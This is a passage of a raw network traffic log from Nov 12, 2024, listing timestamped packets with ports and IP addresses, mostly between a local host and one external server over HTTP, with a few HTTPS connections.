Nov 12, 2024 00:06:26.233501911 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.233671904 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233688116 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233699083 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233710051 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233721018 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233721972 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.233732939 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233743906 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233755112 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233761072 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.233772993 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233778954 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.233784914 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233797073 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233798027 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.233814001 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233824968 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233836889 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233839989 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.233846903 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233863115 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.233864069 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233876944 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233882904 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.233890057 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233901024 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233901978 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.233911991 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233926058 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.233927965 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233944893 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233953953 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.233957052 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233971119 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.233979940 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233993053 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.233999968 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.234004974 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234015942 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234025002 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.234028101 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234044075 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.234045029 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234057903 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234070063 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234081030 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234091997 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.234097004 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234114885 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234127998 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.234132051 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234138966 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.234144926 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234158993 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234169006 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234169960 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.234196901 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.234220982 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.234230995 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234242916 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234256029 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234266043 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234270096 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.234282970 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.234309912 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.234311104 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234323025 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234333992 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234350920 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.234363079 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.234436989 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234448910 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234461069 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234472990 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234478951 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.234484911 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234498024 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234500885 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.234510899 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234524012 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234530926 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.234549999 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234551907 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.234580994 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.234610081 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.234639883 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234651089 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234663010 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234673023 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234683990 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234707117 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234755993 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234767914 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234818935 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.234860897 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234872103 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234884024 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234894037 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234905005 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234915972 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234926939 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.234962940 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235009909 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235021114 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235032082 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.235057116 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235059977 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.235079050 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235097885 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235109091 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235120058 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235167980 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.235271931 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235284090 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235302925 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235318899 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235330105 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235341072 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235352993 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235363007 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235374928 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235384941 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235395908 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235441923 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.235460043 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235476971 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235487938 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235506058 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235517025 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235527992 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235635042 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.235676050 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235687017 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235697031 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235708952 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235721111 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235730886 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235737085 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235743999 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235790968 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235827923 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.235845089 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.235852957 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235865116 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.235888004 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.235918999 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.236038923 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.236054897 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.236067057 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.236078024 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.236080885 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.236089945 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.236099958 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.236100912 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.236114025 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.236124992 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.236125946 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.236139059 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.236143112 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.236151934 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.236159086 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.236164093 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.236180067 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.236185074 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.236193895 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.236205101 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.236211061 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.236226082 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.236227036 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.236251116 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.236260891 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.236268044 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.236291885 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.236481905 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.236491919 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.236502886 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.236512899 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.236526012 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.236536980 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.236548901 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.236561060 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.236572027 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.236582994 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.236587048 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.236617088 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.237385035 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.237396002 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.237407923 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.237421036 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.237602949 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.242157936 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.242189884 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.242201090 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.242242098 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.242254972 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.242265940 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.242275953 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.242295027 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.242311954 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.277986050 CET	49817	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.278007984 CET	443	49817	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.278259039 CET	49820	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.278280020 CET	443	49820	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.278439045 CET	49818	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.278460979 CET	443	49818	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.278575897 CET	49819	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.278583050 CET	443	49819	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.279201031 CET	443	49817	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.279213905 CET	443	49817	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.279273033 CET	49817	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.279422998 CET	443	49820	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.279433966 CET	443	49820	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.279476881 CET	49820	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.279612064 CET	443	49818	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.279620886 CET	443	49818	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.279722929 CET	443	49819	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.279726028 CET	49818	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.279738903 CET	443	49819	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.279784918 CET	49819	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.280915976 CET	49817	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.280977964 CET	443	49817	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.281481028 CET	49820	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.281548023 CET	443	49820	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.281881094 CET	49818	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.281944990 CET	443	49818	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.282270908 CET	49819	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.282331944 CET	443	49819	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.284699917 CET	443	49823	23.219.161.135	192.168.2.5
Nov 12, 2024 00:06:26.296241999 CET	49823	443	192.168.2.5	23.219.161.135
Nov 12, 2024 00:06:26.296252012 CET	443	49823	23.219.161.135	192.168.2.5
Nov 12, 2024 00:06:26.297271013 CET	443	49823	23.219.161.135	192.168.2.5
Nov 12, 2024 00:06:26.297327042 CET	49823	443	192.168.2.5	23.219.161.135
Nov 12, 2024 00:06:26.313615084 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.313627005 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.313637972 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.313663960 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.313663006 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.313678026 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.313690901 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.313690901 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.313704014 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.313705921 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.313731909 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.313755035 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.330591917 CET	49818	443	192.168.2.5	172.64.41.3
Nov 12, 2024 00:06:26.330599070 CET	443	49818	172.64.41.3	192.168.2.5
Nov 12, 2024 00:06:26.345077038 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345098972 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345108032 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345158100 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.345212936 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345225096 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345236063 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345254898 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345263958 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.345268965 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345280886 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345278978 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.345294952 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345305920 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345313072 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.345319033 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345335007 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345340014 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.345346928 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345356941 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.345361948 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345374107 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345381975 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.345385075 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345396042 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345407963 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345410109 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.345431089 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.345437050 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345448971 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.345465899 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345470905 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.345477104 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345505953 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345510960 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.345518112 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345527887 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345540047 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345546961 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.345561028 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.345587969 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.345627069 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345638990 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345649958 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345659971 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345671892 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.345671892 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345678091 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345700979 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.345712900 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345725060 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.345747948 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.345849037 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345860004 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345870972 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345881939 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345881939 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.345894098 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345901966 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.345906019 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345916033 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.345920086 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345932961 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345946074 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.345947027 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345957041 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.345964909 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.345980883 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.345992088 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346004009 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346005917 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346014977 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346029997 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346031904 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346038103 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346045017 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346056938 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346065044 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346069098 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346081018 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346081018 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346101046 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346101046 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346112967 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346123934 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346123934 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346136093 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346146107 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346153021 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346164942 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346180916 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:26.346182108 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:26.346193075 CET	80	49758	185.215.113.206	192.168.2.5
